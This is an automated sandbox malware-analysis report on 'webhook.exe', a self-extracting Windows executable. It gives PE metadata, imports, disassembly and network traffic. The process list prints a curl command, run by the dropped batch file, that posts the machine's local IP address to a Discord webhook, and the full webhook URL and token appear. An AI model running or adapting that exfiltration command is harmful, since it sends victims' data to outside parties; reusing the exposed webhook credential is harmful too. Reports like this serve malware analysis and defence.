Process:	C:\Windows\System32\cmd.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	63
Entropy (8bit):	4.576663559094717
Encrypted:	false
SSDEEP:	3:3FFmKLmd1zEGEY+3QwoFXWJbRFhAyn:3FFmQiNvEJQHwbdAyn
MD5:	6E9B1CEC9721356D33D5D7D329891F50
SHA1:	20A5C056A34AEBB3D6D88299B469C382CFED3C95
SHA-256:	9612EB75E415D5518E468B8CD764EE41CF318C140FB27007E2E5815E6E57E160
SHA-512:	0579FB4FF7FFA32FFC533507592A7BE7ABD1D432B592688ACD41F84DB160858AC8EF43F7CC1BFAA30F00B8E16F9EB9E5F367E32B0EC98765058C0E27CFBC2218
Malicious:	false
Reputation:	low
Preview:	{.. "content": "My local IP address is: 192.168.2.4`ns"..}..

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	6.30405433517673
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	webhook.exe
File size:	188'416 bytes
MD5:	5765bde6d3062b30890598996b671db0
SHA1:	5b36dcecd5e3ba131fc05973179bffbbec08291d
SHA256:	ebc2dba491422a0c420cc22ffe91483fe4885ecfae57baa2ed207252d9afd5de
SHA512:	b7522888759ab43921328457c213d77338abc28cb967c645c82f26295dbc498937bb2c52dd7bb9252693ab3b26e221d26ac516acd2e4eb6fee5bf7f9bb7e839f
SSDEEP:	3072:7MobR7ezAjLOZvmX165GWp1icKAArDZz4N9GhbkrNEk+5fJ3qa1lE+o:IeR7eamm+p0yN90QE9
TLSH:	31047B0A27E62066F0B25B7099F202C34A79BCA37BB592BF5784817D0E336C49571F72
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .'8d.Ikd.Ikd.Ik/.Lje.Ik/.Jjg.Ik/.Mjw.Ik/.Hju.Ikd.Hk..Ik/.Ajn.Ik/..ke.Ik/.Kje.IkRichd.Ik................PE..d..._............."

File Icon


Icon Hash:	3b6120282c4c5a1f

Static PE Info

General

Entrypoint:	0x140001150
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0xD97FD45F [Sun Aug 19 04:21:51 2085 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	10
OS Version Minor:	0
File Version Major:	10
File Version Minor:	0
Subsystem Version Major:	10
Subsystem Version Minor:	0
Import Hash:	4cea7ae85c87ddc7295d39ff9cda31d1

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F0761094FD0h
dec eax
add esp, 28h
jmp 00007F076109484Bh
int3
int3
int3
int3
int3
int3
dec eax
mov dword ptr [esp+08h], ebx
dec eax
mov dword ptr [esp+10h], edi
inc ecx
push esi
dec eax
sub esp, 000000B0h
and dword ptr [esp+20h], 00000000h
dec eax
lea ecx, dword ptr [esp+40h]
call dword ptr [000082A5h]
nop
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ebx, dword ptr [eax+08h]
xor edi, edi
xor eax, eax
dec eax
cmpxchg dword ptr [0000B9D2h], ebx
je 00007F076109484Ch
dec eax
cmp eax, ebx
jne 00007F076109485Fh
mov edi, 00000001h
mov eax, dword ptr [0000B9C8h]
cmp eax, 01h
jne 00007F076109485Ch
lea ecx, dword ptr [eax+1Eh]
call 00007F0761094E64h
jmp 00007F07610948C9h
mov ecx, 000003E8h
call dword ptr [00008253h]
jmp 00007F0761094806h
mov eax, dword ptr [0000B9A3h]
test eax, eax
jne 00007F07610948A5h
mov dword ptr [0000B995h], 00000001h
dec esp
lea esi, dword ptr [000084DEh]
dec eax
lea ebx, dword ptr [000084BFh]
dec eax
mov dword ptr [esp+30h], ebx
mov dword ptr [esp+24h], eax
dec ecx
cmp ebx, esi
jnc 00007F0761094871h
test eax, eax
jne 00007F0761094871h
dec eax
cmp dword ptr [ebx], 00000000h
je 00007F076109485Ch
dec ecx
mov edx, 5E523070h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa394	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xf000	0x1e0d4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0xe000	0x444	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2e000	0x30	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x9a78	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x9010	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9150	0x520	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x7eb0	0x8000	8f5ddc5fa0c3119d30f7e00d7bfd48aa	False	0.547576904296875	data	6.109997796878264	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9000	0x2420	0x3000	79a5acf192c71ab3579d24a79e81e45b	False	0.3240559895833333	data	3.9065058401206216	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xc000	0x1f00	0x1000	f198899505f620007167379f74f8141c	False	0.083251953125	data	1.0384025678015962	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0xe000	0x444	0x1000	d87d18cc3448a50b581d9a9660a39914	False	0.164306640625	PEX Binary Archive	1.4622023798757706	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xf000	0x1f000	0x1f000	bbe705de4a7a23fcb6d7820b74eeda77	False	0.6625346522177419	data	6.821649689100556	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2e000	0x30	0x1000	b86e33c1f7fc5de5ef683b7d6eea5c32	False	0.01806640625	data	0.11282277483477143	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
AVI	0xfb30	0x2e1a	RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp	English	United States	0.2713099474665311
RT_ICON	0x1294c	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.3225609756097561
RT_ICON	0x12fb4	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.41263440860215056
RT_ICON	0x1329c	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 288	English	United States	0.4569672131147541
RT_ICON	0x13484	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.5574324324324325
RT_ICON	0x135ac	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.6223347547974414
RT_ICON	0x14454	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.7369133574007221
RT_ICON	0x14cfc	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	English	United States	0.783410138248848
RT_ICON	0x153c4	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.3829479768786127
RT_ICON	0x1592c	0xd9d2	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	1.0004662673505254
RT_ICON	0x23300	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.5300829875518672
RT_ICON	0x258a8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.6137429643527205
RT_ICON	0x26950	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.703688524590164
RT_ICON	0x272d8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.425531914893617
RT_DIALOG	0x27740	0x2f2	data	English	United States	0.4389920424403183
RT_DIALOG	0x27a34	0x30c	data	Swedish	Sweden	0.4371794871794872
RT_DIALOG	0x27d40	0x1b0	data	English	United States	0.5625
RT_DIALOG	0x27ef0	0x1b0	data	Swedish	Sweden	0.5578703703703703
RT_DIALOG	0x280a0	0x166	data	English	United States	0.5223463687150838
RT_DIALOG	0x28208	0x148	data	Swedish	Sweden	0.5274390243902439
RT_DIALOG	0x28350	0x1c0	data	English	United States	0.5446428571428571
RT_DIALOG	0x28510	0x1b0	data	Swedish	Sweden	0.5532407407407407
RT_DIALOG	0x286c0	0x130	data	English	United States	0.5526315789473685
RT_DIALOG	0x287f0	0x11e	data	Swedish	Sweden	0.541958041958042
RT_DIALOG	0x28910	0x120	data	English	United States	0.5763888888888888
RT_DIALOG	0x28a30	0x118	data	Swedish	Sweden	0.5857142857142857
RT_STRING	0x28b48	0x8c	Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0	English	United States	0.6214285714285714
RT_STRING	0x28bd4	0x8c	Matlab v4 mat-file (little endian) \344, numeric, rows 0, columns 0	Swedish	Sweden	0.6285714285714286
RT_STRING	0x28c60	0x520	data	English	United States	0.4032012195121951
RT_STRING	0x29180	0x59c	data	Swedish	Sweden	0.3544568245125348
RT_STRING	0x2971c	0x5cc	data	English	United States	0.36455525606469
RT_STRING	0x29ce8	0x672	data	Swedish	Sweden	0.34424242424242424
RT_STRING	0x2a35c	0x4b0	data	English	United States	0.385
RT_STRING	0x2a80c	0x506	data	Swedish	Sweden	0.36702954898911355
RT_STRING	0x2ad14	0x44a	data	English	United States	0.3970856102003643
RT_STRING	0x2b160	0x43c	data	Swedish	Sweden	0.4188191881918819
RT_STRING	0x2b59c	0x3ce	data	English	United States	0.36858316221765913
RT_STRING	0x2b96c	0x332	data	Swedish	Sweden	0.38264058679706603
RT_RCDATA	0x2bca0	0x7	ASCII text, with no line terminators	English	United States	2.142857142857143
RT_RCDATA	0x2bca8	0x2da	Microsoft Cabinet archive data, Windows 2000/XP setup, 730 bytes, 1 file, at 0x2c +A "webhook.bat", ID 1108, number 1, 1 datablock, 0x1503 compression	Swedish	Sweden	1.015068493150685
RT_RCDATA	0x2bf84	0x4	data	Swedish	Sweden	3.0
RT_RCDATA	0x2bf88	0x24	data	Swedish	Sweden	0.8055555555555556
RT_RCDATA	0x2bfac	0x7	ASCII text, with no line terminators	Swedish	Sweden	2.142857142857143
RT_RCDATA	0x2bfb4	0x7	ASCII text, with no line terminators	Swedish	Sweden	2.142857142857143
RT_RCDATA	0x2bfbc	0x4	data	Swedish	Sweden	3.0
RT_RCDATA	0x2bfc0	0x7	ASCII text, with no line terminators	English	United States	2.142857142857143
RT_RCDATA	0x2bfc8	0x4	data	Swedish	Sweden	3.0
RT_RCDATA	0x2bfcc	0x15	ASCII text, with no line terminators	English	United States	1.380952380952381
RT_RCDATA	0x2bfe4	0x4	data	Swedish	Sweden	3.0
RT_RCDATA	0x2bfe8	0x2	data	Swedish	Sweden	5.0
RT_RCDATA	0x2bfec	0x7	ASCII text, with no line terminators	Swedish	Sweden	2.142857142857143
RT_RCDATA	0x2bff4	0x13	ASCII text, with no line terminators	English	United States	1.4210526315789473
RT_GROUP_ICON	0x2c008	0xbc	data	English	United States	0.6117021276595744
RT_VERSION	0x2c0c4	0x408	data	English	United States	0.42054263565891475
RT_VERSION	0x2c4cc	0x420	data	Swedish	Sweden	0.4384469696969697
RT_MANIFEST	0x2c8ec	0x7e6	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.37734915924826906

Imports

DLL	Import
ADVAPI32.dll	GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
KERNEL32.dll	_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, LoadLibraryExA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, WaitForSingleObject, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, ExpandEnvironmentStringsA, LocalAlloc, lstrcmpA, FindNextFileA, GetCurrentProcess, FindFirstFileA, GetModuleFileNameA, GetShortPathNameA, Sleep, GetStartupInfoW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, EnumResourceLanguagesA, GetDiskFreeSpaceA, MulDiv, FindClose
GDI32.dll	GetDeviceCaps
USER32.dll	ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetSystemMetrics, CallWindowProcA, SetWindowTextA, MessageBoxA, SendDlgItemMessageA, SendMessageA, GetDlgItem, DialogBoxIndirectParamA, GetWindowLongPtrA, SetWindowLongPtrA, SetForegroundWindow, ReleaseDC, EnableWindow, CharNextA, LoadStringA, CharPrevA, EndDialog, MessageBeep, ExitWindowsEx, SetDlgItemTextA, CharUpperA, GetDesktopWindow, PeekMessageA, GetDlgItemTextA
msvcrt.dll	?terminate@@YAXXZ, _commode, _fmode, _acmdln, __C_specific_handler, memset, __setusermatherr, _ismbblead, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, _XcptFilter, memcpy_s, _vsnprintf, _initterm, memcpy
COMCTL32.dll
Cabinet.dll
VERSION.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States
Swedish	Sweden

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 16, 2024 08:30:10.588248014 CET	49734	443	192.168.2.4	162.159.138.232
Dec 16, 2024 08:30:10.588305950 CET	443	49734	162.159.138.232	192.168.2.4
Dec 16, 2024 08:30:10.588459015 CET	49734	443	192.168.2.4	162.159.138.232
Dec 16, 2024 08:30:10.621907949 CET	49734	443	192.168.2.4	162.159.138.232
Dec 16, 2024 08:30:10.621926069 CET	443	49734	162.159.138.232	192.168.2.4
Dec 16, 2024 08:30:11.841404915 CET	443	49734	162.159.138.232	192.168.2.4
Dec 16, 2024 08:30:11.841487885 CET	49734	443	192.168.2.4	162.159.138.232
Dec 16, 2024 08:30:11.844814062 CET	49734	443	192.168.2.4	162.159.138.232
Dec 16, 2024 08:30:11.844825983 CET	443	49734	162.159.138.232	192.168.2.4
Dec 16, 2024 08:30:11.845093012 CET	443	49734	162.159.138.232	192.168.2.4
Dec 16, 2024 08:30:11.847923994 CET	49734	443	192.168.2.4	162.159.138.232
Dec 16, 2024 08:30:11.895327091 CET	443	49734	162.159.138.232	192.168.2.4
Dec 16, 2024 08:30:12.365638971 CET	443	49734	162.159.138.232	192.168.2.4
Dec 16, 2024 08:30:12.365770102 CET	443	49734	162.159.138.232	192.168.2.4
Dec 16, 2024 08:30:12.365963936 CET	49734	443	192.168.2.4	162.159.138.232
Dec 16, 2024 08:30:12.367583036 CET	49734	443	192.168.2.4	162.159.138.232
Dec 16, 2024 08:30:12.367604017 CET	443	49734	162.159.138.232	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 16, 2024 08:30:10.441389084 CET	64271	53	192.168.2.4	1.1.1.1
Dec 16, 2024 08:30:10.581599951 CET	53	64271	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 16, 2024 08:30:10.441389084 CET	192.168.2.4	1.1.1.1	0xa60e	Standard query (0)	discord.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 16, 2024 08:30:10.581599951 CET	1.1.1.1	192.168.2.4	0xa60e	No error (0)	discord.com	162.159.138.232	A (IP address)	IN (0x0001)	false
Dec 16, 2024 08:30:10.581599951 CET	1.1.1.1	192.168.2.4	0xa60e	No error (0)	discord.com	162.159.128.233	A (IP address)	IN (0x0001)	false
Dec 16, 2024 08:30:10.581599951 CET	1.1.1.1	192.168.2.4	0xa60e	No error (0)	discord.com	162.159.135.232	A (IP address)	IN (0x0001)	false
Dec 16, 2024 08:30:10.581599951 CET	1.1.1.1	192.168.2.4	0xa60e	No error (0)	discord.com	162.159.136.232	A (IP address)	IN (0x0001)	false
Dec 16, 2024 08:30:10.581599951 CET	1.1.1.1	192.168.2.4	0xa60e	No error (0)	discord.com	162.159.137.232	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

discord.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49734	162.159.138.232	443	3340	C:\Windows\System32\curl.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 07:30:11 UTC	229	OUT	POST /api/webhooks/1285980629988802621/qvdwM_2Etcrhfd3BeE7em_7Ki8g5TtL1XpoCOOldpWtkdEpZOLeERx2WW4gv8kmABPXQ HTTP/1.1 Host: discord.com User-Agent: curl/7.83.1 Accept: / Content-Type: application/json Content-Length: 57
2024-12-16 07:30:11 UTC	57	OUT	Data Raw: 7b 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 22 4d 79 20 6c 6f 63 61 6c 20 49 50 20 61 64 64 72 65 73 73 20 69 73 3a 20 31 39 32 2e 31 36 38 2e 32 2e 34 60 6e 73 22 7d Data Ascii: { "content": "My local IP address is: 192.168.2.4`ns"}
2024-12-16 07:30:12 UTC	1356	IN	HTTP/1.1 204 No Content Date: Mon, 16 Dec 2024 07:30:12 GMT Content-Type: text/html; charset=utf-8 Connection: close Set-Cookie: __dcfduid=95e6ff5cbb7f11ef8d640a6546079b99; Expires=Sat, 15-Dec-2029 07:30:12 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1734334213 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3oAD84pfky9V7HO%2BzGX8Op3D%2F3xBKD1nzpV3lv%2FNFomZNMtM1Ydl2JRufQqWXeC2AZbbXRzd9ptUKbyYm8tCO0xyVMBbQT47DHjeUKQzssFR%2FMgeu8AzIPwKxES1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=95e6ff5cbb7f11ef8d640a6546079b99860010102cfcfdfbce5771b4a35c1a559f9dcdf0d455c608feb3ebb90a9e5057; Expires=Sat, 15-Dec-2029 07:30:12 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=431c83f5438cff61c4aedf977ed8e956d536930d-1734334212; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-12-16 07:30:12 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 35 56 48 48 4d 58 39 58 41 51 7a 79 77 59 43 70 38 76 79 4d 41 6f 2e 56 47 46 36 43 4f 2e 56 6b 6b 52 6c 71 57 4a 34 35 37 75 49 2d 31 37 33 34 33 33 34 32 31 32 32 30 38 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 32 63 66 37 37 39 62 66 31 65 34 33 34 33 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=5VHHMX9XAQzywYCp8vyMAo.VGF6CO.VkkRlqWJ457uI-1734334212208-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f2cf779bf1e4343-EWR

Target ID:	0
Start time:	02:30:08
Start date:	16/12/2024
Path:	C:\Users\user\Desktop\webhook.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\webhook.exe"
Imagebase:	0x7ff650540000
File size:	188'416 bytes
MD5 hash:	5765BDE6D3062B30890598996B671DB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	02:30:08
Start date:	16/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c "webhook.bat"
Imagebase:	0x7ff600a80000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:30:08
Start date:	16/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:30:09
Start date:	16/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ipconfig \| findstr /i "IPv4"
Imagebase:	0x7ff600a80000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:30:09
Start date:	16/12/2024
Path:	C:\Windows\System32\ipconfig.exe
Wow64 process (32bit):	false
Commandline:	ipconfig
Imagebase:	0x7ff6e94b0000
File size:	35'840 bytes
MD5 hash:	62F170FB07FDBB79CEB7147101406EB8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:30:09
Start date:	16/12/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /i "IPv4"
Imagebase:	0x7ff7de2e0000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:30:09
Start date:	16/12/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl -H "Content-Type: application/json" -d @"C:\Users\user\AppData\Local\Temp\discord_webhook.json" "https://discord.com/api/webhooks/1285980629988802621/qvdwM_2Etcrhfd3BeE7em_7Ki8g5TtL1XpoCOOldpWtkdEpZOLeERx2WW4gv8kmABPXQ"
Imagebase:	0x7ff60c910000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	24.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	40.8%
Total number of Nodes:	989
Total number of Limit Nodes:	43

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FF65054721C Relevance: 52.9, APIs: 17, Strings: 13, Instructions: 372
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00007FF6505472AC
CompareStringA.KERNEL32 ref: 00007FF650547373
GetProcAddress.KERNEL32 ref: 00007FF650547511

Part of subcall function 00007FF650545140: FindResourceExA.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF650545168
Part of subcall function 00007FF650545140: SizeofResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF650545179
Part of subcall function 00007FF650545140: FindResourceA.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF65054519F
Part of subcall function 00007FF650545140: LoadResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451B0
Part of subcall function 00007FF650545140: LockResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451BF
Part of subcall function 00007FF650545140: memcpy_s.MSVCRT ref: 00007FF6505451DE
Part of subcall function 00007FF650545140: FreeResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451ED

CompareStringA.KERNEL32 ref: 00007FF650547475
FreeLibrary.KERNEL32 ref: 00007FF6505475EC
LocalFree.KERNEL32 ref: 00007FF650547617
FreeLibrary.KERNEL32 ref: 00007FF65054763A
LocalFree.KERNEL32 ref: 00007FF650547649

Strings

POSTRUNPROGRAM, xrefs: 00007FF650547436
<None>, xrefs: 00007FF650547355, 00007FF650547457
SHOWWINDOW, xrefs: 00007FF6505472D0
USRQCMD, xrefs: 00007FF65054733B
advpack.dll, xrefs: 00007FF6505476E0
DoInfInstall, xrefs: 00007FF650547507, 00007FF65054768D
wextract_cleanup0, xrefs: 00007FF65054779D, 00007FF650547860
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00007FF65054776C
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00007FF650547830
REBOOT, xrefs: 00007FF65054727B
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF650547548, 00007FF65054781A
ADMQCMD, xrefs: 00007FF65054732A
RUNPROGRAM, xrefs: 00007FF6505473A2

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: Resource$Free$CompareFindLibraryLocalString$AddressLoadLockProcSizeofmemcpy_smemset
String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$Software\Microsoft\Windows\CurrentVersion\RunOnce$USRQCMD$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
API String ID: 2679723528-3510600114
Opcode ID: 5faff083ef84e0ac4e652a791b24264bbf5c15901bde1c5e60f4bd780682b69e
Instruction ID: 89346d8300775adede97a5592df4272997572bb6cd45f5c96a6e7051c76b2fb4
Opcode Fuzzy Hash: 5faff083ef84e0ac4e652a791b24264bbf5c15901bde1c5e60f4bd780682b69e
Instruction Fuzzy Hash: 6E029E71A08B47B6EB608F24EA402F97BA0FB84744F481135DA8DA37A4DF7CE564CB00

